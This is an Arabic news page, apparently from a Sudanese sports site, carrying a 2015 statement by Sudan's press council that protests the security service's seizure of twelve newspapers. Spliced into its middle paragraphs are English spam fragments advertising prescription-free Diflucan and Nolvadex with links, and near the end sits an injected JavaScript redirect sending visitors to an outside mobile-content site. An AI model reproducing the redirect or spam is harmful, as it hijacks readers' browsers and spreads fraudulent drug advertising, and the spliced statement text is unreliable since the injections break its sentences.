سودانا فوق
موقع سودانا فوق موقع رياضي إخباري يأتي بجديد الأخبار الرياضية المتعلقة بدولة السودان.

بعد مصادرة ١٢ صحيفة اليوم ..بيـان من هيئة مجلس الصحافة والمطبوعات الصحفية

4

عاجلعقدت هيئة المجلس القومى للصحافة والمطبوعات الصحفية، اليوم، اجتماعاً طارئاً على خلفية مصادرة “جهاز الأمن والمخابرات الوطنى” ما وصل عدده إلى 12 صحيفة شاملة وصحيفتين اجتماعيتين. وحيث أنه لم تكتمل لدى هيئة المجلس حتى وقت اجتماعها المذكور الحيثيات والوقائع التى أملت اتخاذ مثل هذه الخطوة غير المسبوقة فإن الهيئة تود أن توضح الآتى:

ـ تعبر هيئة المجلس عن أسفها العميق تجاه الخطوة التى تم اتخاذها بتعطيل ومصادرة هذا العدد الكبير من الصحف، وتؤمن الهيئة بأنه كان بالوسع حتى بافتراض وجود أخطاء وقعت فيها الصحف تدارك الأمر ومحاسبة المخطئين بمنهج وأسلوب يتناسب وقانون الصحافة والمطبوعات الصحفية لسنة 2009م.

ـ تُذكِّر الهيئة بأن الشأن الصحفى فى البلاد يُدار بواسطة المجلس القومى للصحافة والمطبوعات الصحفية عن طريق قانون خاص هو قانون الصحافة والمطبوعات الصحفية. ولأن القانون الخاص يقيد العام فقد كان من المرتجى أن يكون المجلس هو الجهة التى تحاسِب الصحف إذا وقعت فى أخطاء مخالفة للقانون.

ـ يُقر المجلس بحساسية الأوضاع السياسية والاجتماعية التى تمر بها البلاد فى هذه المرحلة على وجه التحديد، الأمر الذى كان يتطلب أن تتعامل معه الصحافة بالقدر الذى يقابل ذلك من المسؤولية الوطنية وأن تتجنب فى تعاطيها مع الأحداث والوقائع جميع أشكال الإثارة الضارة بالمجتمع أو بأمن buy diflucan. online canada drugstore. discount generic ?if pediatric dose fluconazole buy diflucan without no prescription vetrinary displaced apex using others over-correction. radiographic clues in your problem. البلاد القومى وخاصة تحركات القوات المسلحة.

ـ تؤمن هيئة المجلس إيماناً كاملاً بأن الإجراءات الطبيعية هى الأنفع والأجدى على المديين الطويل والقصير فى التعامل مع تجاوزات الصحافة وأخطائها سواء أكانت كثيرة أم قليلة. وفى المقابل فإن الإجراءات الاستثنائية من شأنها أن تلحق ضرراً بليغاً بالمشهد الصحفى والسياسى فى البلاد عموماً وتضر بمساحة الحريات التى كفلها الدستور فى المادة “39”، والقانون.

ـ تؤكد هيئة المجلس تحملها الكامل لمسؤوليتها التى كفلها القانون وستشرع فوراً فى إجراء اتصالاتها مع رئاسة الجمهورية ومع شركاء العمل الصحفى فى البلاد ممثلين فى اتحاد الصحفيين والناشرين ورؤساء التحرير ووزارة الإعلام وجهاز الأمن والمخابرات لاحتواء الآثار السالبة لما حدث والاتفاق على منهج يتراضى عليه الجميع ويكون من شأنه تمكين الصحافة من أداء دورها ورسالتها بمسؤولية فى bing.com-[en-us];buy cheap nolvadex;http://buy-nolvadex.in.net;http://buy-nolvadex.in.net/;where can i buy nolvadex online. nolvadex pct.;nolvadex safe & cheap? home pricelist information. buy nolvadex: nolvadex (tamoxifen) … where can i buy nolvadex online. buy nolvadex online. nolvadex ? المجتمع وفى ذات الوقت المحافظة على أمن البلاد وسلامة أهلها.

 

 

 

الخـرطـــــــــوم

الأُثنين 16 فبراير 2015م

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

احصل على تحديثات في الوقت الفعلي مباشرة على جهازك ، اشترك الآن.

التعليقات مغلقة.